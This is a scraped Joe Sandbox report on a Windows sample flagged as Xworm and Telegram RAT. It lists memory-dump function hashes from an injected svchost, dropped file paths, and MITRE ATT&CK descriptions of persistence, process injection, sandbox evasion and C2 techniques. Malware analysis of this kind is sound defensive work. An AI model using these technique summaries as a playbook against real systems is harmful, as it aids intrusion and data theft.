Opcode ID: d72ae8b028412dd12b823de0623dee33fd18e7fc8626b7b299e3854d845481bb
Instruction ID: 7b05696562b08c3d3653c4f66c9a4a8e3ed767070c22464da1265912835a19fe
Opcode Fuzzy Hash: d72ae8b028412dd12b823de0623dee33fd18e7fc8626b7b299e3854d845481bb
Instruction Fuzzy Hash: D331DD61F189094FEB84BBB8586A7BD77D1EF99301F1401BAE41DC32D7DE2CA8018392

Function 00007FFD9A3E09E1 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f2dd9e98afad4856b7070cbed170eea57555cf4d806bd330b1a16ef447692c4
Instruction ID: a31e89e6cabfb6385aa138a6a5523f45a14e22934b2408a6f08dc4212b488f30
Opcode Fuzzy Hash: 3f2dd9e98afad4856b7070cbed170eea57555cf4d806bd330b1a16ef447692c4
Instruction Fuzzy Hash: 31319171F2890D9FDB44EFA888656BDBBA1FF98300F544579D01AD328ADE38A801C781

Function 00007FFD9A3E1648 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72730d1da4e4fd1508ac055e83069bf6294fc6d42ad083d89e9e0b5b031a29d8
Instruction ID: 8da78ac38172abc0bdaebc9315c8c4430f177e38cff116488896b4a59e3c24d0
Opcode Fuzzy Hash: 72730d1da4e4fd1508ac055e83069bf6294fc6d42ad083d89e9e0b5b031a29d8
Instruction Fuzzy Hash: 4D110063F1440A4BDB58EF98DC655FDB7B1EFA4200B94027AD11AE72E6CE342C428780

Function 00007FFD9A3E21A1 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f61ed8694e7acaa62c1ddd2a1f1a39c9b7204f6b17d258d0e6c614db8d1a3da
Instruction ID: ecb3213831db29491cc46e1a05396648d3d1c92f04d67b3c0fad634b18681cc6
Opcode Fuzzy Hash: 4f61ed8694e7acaa62c1ddd2a1f1a39c9b7204f6b17d258d0e6c614db8d1a3da
Instruction Fuzzy Hash: 0B012812B1C2C54FE79ABBB818359753FA0CF81250B1804FBE888C60DBDD086A418392

Function 00007FFD9A3E16E9 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbdd4d77fd0ffbc004b74c247aea111f3111def2d7e89132a718e4ad0b2f6ec4
Instruction ID: 4bad364dedb4a768fc5d8bee51ee0db63f0e87cd7b1028c3dfbb306bf5940d42
Opcode Fuzzy Hash: cbdd4d77fd0ffbc004b74c247aea111f3111def2d7e89132a718e4ad0b2f6ec4
Instruction Fuzzy Hash: E4E0223390CA944FD389DB549825271BBE0EF92220B0D42EBC099C71A2C76D09428381

Function 00007FFD9A3E1238 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d625cb09de28d678adc7b6ae175e491f98d1ce6bb65facf15cbe94279b2ca615
Instruction ID: 9eff09851bf591a77d92cf0f1350bacda3abb1da20e15d66745378660e8443b1
Opcode Fuzzy Hash: d625cb09de28d678adc7b6ae175e491f98d1ce6bb65facf15cbe94279b2ca615
Instruction Fuzzy Hash: B8D02E33A08E190BE3ACEA48A000274F3D0EFA42A0B2801AFD41AD32A4C9A61C4282C0

Non-executed Functions

Function 00007FFD9A3E06FA Relevance: 7.6, Strings: 6, Instructions: 116COMMON

Download Yara Rule

Strings

M_^h, xrefs: 00007FFD9A3E0722
=M_^, xrefs: 00007FFD9A3E0701
M_^~, xrefs: 00007FFD9A3E077A
M_^|, xrefs: 00007FFD9A3E0772
M_^^, xrefs: 00007FFD9A3E06FA
M_^j, xrefs: 00007FFD9A3E072A

Memory Dump Source

Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd

Similarity

API ID:
String ID: =M_^$M_^^$M_^h$M_^j$M_^|$M_^~
API String ID: 0-1553104472
Opcode ID: 2e0e7008a7b0ad65e64e3d2650f7f347bb5d039117d2750577f851d7af0e8b27
Instruction ID: 35a2e157ddad2a099ace6b497c355748225ed779748de880c5d3571576f5c964
Opcode Fuzzy Hash: 2e0e7008a7b0ad65e64e3d2650f7f347bb5d039117d2750577f851d7af0e8b27
Instruction Fuzzy Hash: 3D31F2A7F5D0669AE3123BFC78228DC33819F8136875D07B6D0BCCB0CB9D18649A49D2

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: Telegram RAT

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1eesaedm.0gz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22zaeb0w.g0a.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kbqhrel.ut2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agesxp1d.nah.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bc2kmm3v.0qb.ps1

Windows Analysis Report
file.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre